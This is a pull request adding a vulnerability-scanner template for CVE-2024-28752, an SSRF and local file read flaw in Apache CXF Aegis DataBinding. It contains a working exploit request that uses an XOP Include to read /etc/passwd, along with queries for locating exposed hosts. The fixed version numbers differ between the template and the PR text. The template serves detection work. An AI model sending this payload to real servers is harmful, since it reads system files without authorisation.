### PR TITLE
Add CVE-2024-28752 - Apache CXF Aegis DataBinding SSRF/LFI

### DIFF
--- a/http/cves/2024/CVE-2024-28752.yaml
+++ b/http/cves/2024/CVE-2024-28752.yaml
@@ -1,0 +1,65 @@
+id: CVE-2024-28752
+
+info:
+  name: Apache CXF < 4.0.4 - Aegis DataBinding SSRF / Local File Read
+  author: maciejklimek
+  severity: high
+  description: |
+    Apache CXF before 4.0.4, 3.6.3 and 3.5.8 has a Server-Side Request Forgery (SSRF) vulnerability when using the Aegis DataBinding. The XOP Include mechanism in multipart SOAP requests can be abused to read local files or make server-side HTTP requests to arbitrary URLs. An attacker can use this to access sensitive internal resources.
+  impact: |
+    An attacker can read arbitrary files from the server and make server-side requests to internal services.
+  remediation: Upgrade Apache CXF to version 4.0.4, 3.6.3, or 3.5.8 or later.
+  reference:
+    - https://nvd.nist.gov/vuln/detail/CVE-2024-28752
+    - https://github.com/advisories/GHSA-qmgx-j96g-4428
+    - https://github.com/ReaJason/CVE-2024-28752
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+    cvss-score: 7.5
+    cve-id: CVE-2024-28752
+    cwe-id: CWE-918
+  metadata:
+    verified: true
+    max-request: 1
+    shodan-query: http.component:"Apache CXF"
+    fofa-query: body="Apache CXF"
+  tags: cve,cve2024,apache,cxf,ssrf,lfi
+
+http:
+  - raw:
+      - |
+        POST /test HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: multipart/related; boundary=----nucleibound
+
+        ------nucleibound
+        Content-Disposition: form-data; name="1"
+
+        <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:web="http://service.namespace/">
+           <soapenv:Header/>
+           <soapenv:Body>
+              <web:test>
+                 <arg0>
+        <count><xop:Include xmlns:xop="http://www.w3.org/2004/08/xop/include" href="file:///etc/passwd"></xop:Include></count>
+        </arg0>
+              </web:test>
+           </soapenv:Body>
+        </soapenv:Envelope>
+        ------nucleibound--
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "Unmarshalling Error"
+
+      - type: regex
+        part: body
+        regex:
+          - "cm9vd[A-Za-z0-9+/=]+"
+
+      - type: word
+        part: content_type
+        words:
+          - "text/xml"


### PR DESCRIPTION
## Summary

Detection template for CVE-2024-28752 — Apache CXF with Aegis DataBinding prior to 3.5.9/3.6.4/4.0.5 allows unauthenticated SSRF and local file read via XOP Include in SOAP requests.

## Verification

Tested against `vulhub/apache-cxf:3.2.14`:
- All 3 matchers hit (Unmarshalling Error in body, base64-encoded `/etc/passwd` in response, `text/xml` content type)
- Successfully exfiltrated `/etc/passwd` contents via base64 in error message
- No authentication required

## References

- https://nvd.nist.gov/vuln/detail/CVE-2024-28752
- https://cxf.apache.org/security-advisories.data/CVE-2024-28752.txt